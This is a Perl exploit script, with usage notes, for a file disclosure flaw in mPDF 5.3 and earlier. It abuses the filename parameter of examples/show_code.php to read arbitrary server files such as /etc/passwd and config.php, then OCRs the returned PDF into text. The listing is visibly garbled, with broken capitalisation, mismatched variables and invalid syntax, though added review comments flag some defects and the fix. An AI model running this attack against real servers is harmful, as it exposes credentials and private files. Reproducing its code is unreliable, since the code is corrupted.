Title: mPDF <= 5.3 File Disclosure
Author: ZadYree www.2cto.com
: Http://www.mpdf1.com/mpdf/download
Affected Versions: 5.3 and prior
Test Platform: Multiple
#! /Usr/bin/perl-U
=head1 TITLE
MPDF <= 5.3 File Disclosure Exploit (0day)
=head2 SYNOPSIS
-- Examples/show_code.php --
Preg_match ('/example [0] {0, 1} (\ d + )_(.*?) \. Php/', $ filename, $ m); <--- URI improperly filtered.
$ Num = intval ($ m [1]);
$ Title = ucfirst (preg_replace ('/_/', '', $ m [2]);
If (! $ Num |! $ Title) {die ("Invalid file ");}
=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected file from the
remote server, returned in PDF format.
The exploit may not work, depending on the htaccess/chmod rules configured on the
remote server.
=head2 USAGE
Perl exploit. pl-r http://www.bkjia.com/mpdf53/../config. php
Perl exploit. pl-a http://p00niez.com/mpdf53//etc/passwd
Required modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3 LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometimes do give you 0 dayz
3 LRVS Team-Support
=cut
# ************* Configuration **************#
# Fixed local path where the fetched response body is written before OCR and
# which the cleanup at the end of the script unlinks. A predictable path under
# /tmp opened with '>' is a clobber/symlink risk for the user running the
# script; File::Temp-style creation would avoid it.
# NOTE(review): make_file() below writes to `$pai_file`, not this variable —
# looks like garbling of the listing; confirm which name is intended.
My $ cmd_file = '/tmp/b00mcallback ';
# NOTE(review): presumably disables PDF::OCR2's own input check; the script
# runs its own is_pdf() mime-type test instead — confirm against the module.
$ PDF: OCR2: CHECK_PDF = 0;
# Read by the final unlink: when set, the temp file is removed after the run.
$ Del_temp_file = 1;
#*************************************** ***#
Use 5.010;
Use PDF: OCR2;
Use Getopt: Std;
Use LWP: Simple;
Use File: Type;
Use constant TRUE => 1;
Use constant FALSE => 0;
# --- main flow ----------------------------------------------------------
# Expects at least two positional arguments (base URL, path to request) on
# top of the -r/-a switch; otherwise prints usage and exits.
Help () unless (@ ARGV> = 2 );
My (% optz, $ uri );
# Only -r and -a are declared in the spec, so the 'h' key read below is never
# populated by getopts.
Getopts ('ra', \ % optz );
My $ relative = $ optz {'R '};
My $ absolute = $ optz {'A '};
My $ help = $ optz {'H '};
# NOTE(review): `$relatife` does not match `$relative` declared above. Under
# `use strict` this would not compile; without it the name is always undef,
# so only -a satisfies this check (typo or page garbling).
Help () unless ($ absolute | $ relatife );
# Positional args: the mPDF base URL and the file path to request through it.
My ($ purl, $ fpath) = @ ARGV;
# Output file name: the host part of the URL, an underscore, the local time,
# and a ".txt" suffix.
My $ name = $ purl;
$ Name = ~ S {http: // (. + ?) /. *} {$1 };
$ Name. = ("_". localtime (time). ". txt ");
# Both branches assign the same query string, so -a and -r behave identically
# as shown (the intended difference is not visible here — possibly lost in
# garbling). The `filename` parameter is what show_code.php's regex filter
# (see the POD synopsis) fails to constrain; the server-side fix for this
# class of bug is to canonicalise the requested path and reject anything that
# resolves outside the examples directory.
$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ absolute );
$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ relative );
Help () unless ($ uri );
My $ furl = $ purl. $ uri. $ fpath;
# Keeps the first "//" (the scheme separator, counter still 0) and collapses
# every later "//" into a single "/". The `$i` counter is an undeclared
# package global.
$ Furl = ~ S # (//) # $ I ++? "/": $1 # eg; # Yeah that's twisted.
Say "[*] Retrieving content ...";
# LWP::Simple::get returns undef on HTTP failure; that undef is written to the
# temp file unchecked and only caught by the mime-type test on the next line.
My $ file = make_file (get ($ furl ));
Die "[-] The stream you requested is not well formatted (forbidden page, etc). \ 012" unless is_pdf ($ file );
Say "[+] OK \ 012 [*] Converting format ...";
# OCR the PDF, then strip every byte outside the 0x0A-0x7F range (keeps LF and
# printable ASCII) before writing the text out. `$pdf` is never declared.
$ Pdf = PDF: OCR2-> new ($ file );
My $ text = $ pdf-> text;
$ Text = ~ S/[^ \ x0A-\ x7F] +? // Gm;
# Unchecked open/print/close on the output file: a write failure is silent.
Open (my $ fh, '>', $ name );
Print $ fh $ text;
Close ($ fh );
Say "[+] OK \ 012 [+] Content successfully extracted! \ NFile: ", $ name;
# `=` here is assignment, not `==`: the condition is always true, so the temp
# file is removed regardless of the configured $del_temp_file value.
Unlink ($ cmd_file) if ($ del_temp_file = TRUE );
# make_file($content): writes $content to the temp path and returns that path.
# The open is unchecked (no `or die`), no encoding layer is set, and `$fh` is
# assigned without `my`, so it is a package global here.
# NOTE(review): `$pai_file` is declared nowhere in the file; the configuration
# block names the temp path `$cmd_file` — likely garbling of the listing.
Sub make_file {
My $ content = shift;
Open ($ fh, '>', $ pai_file );
Print $ fh $ content;
Close ($ fh );
Return ($ pai_file );
}
# is_pdf($path): returns 1 when File::Type reports "application/pdf" for the
# file at $path, 0 otherwise. Relies on File::Type's mime_type() (content
# signature based, not extension based — confirm against the module docs).
Sub is_pdf {
My $ checked_file = shift;
My $ ft = File: Type-> new ();
Return (1) if ($ ft-> mime_type ($ checked_file) eq "application/pdf ");
Return (0 );
}
# Runs only after the whole main flow above has completed, and 'h' is not in
# the getopts spec ('ra'), so $help is never set: this line is effectively dead.
Help () if ($ help );
# help(): prints the usage text to STDOUT (interpolating $0 only) and exits 0.
# Called when arguments are missing or neither -r nor -a was given.
# NOTE(review): `<"EOF "` is not valid heredoc syntax (`<<"EOF"` expected) and
# the trailing space inside the terminator string would not match the bare
# `EOF` line — both look like garbling of the listing.
Sub help {
Say <"EOF ";
Usage: perl $0 [-r |-a] http: // [mPDF URL] <file_to_read>
Details:
-R: Relative path (ex: ../file. php)
-A: Absolute path (ex:/etc/file. zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
# Exit status 0 even when invoked for a usage error.
Exit (0 );
}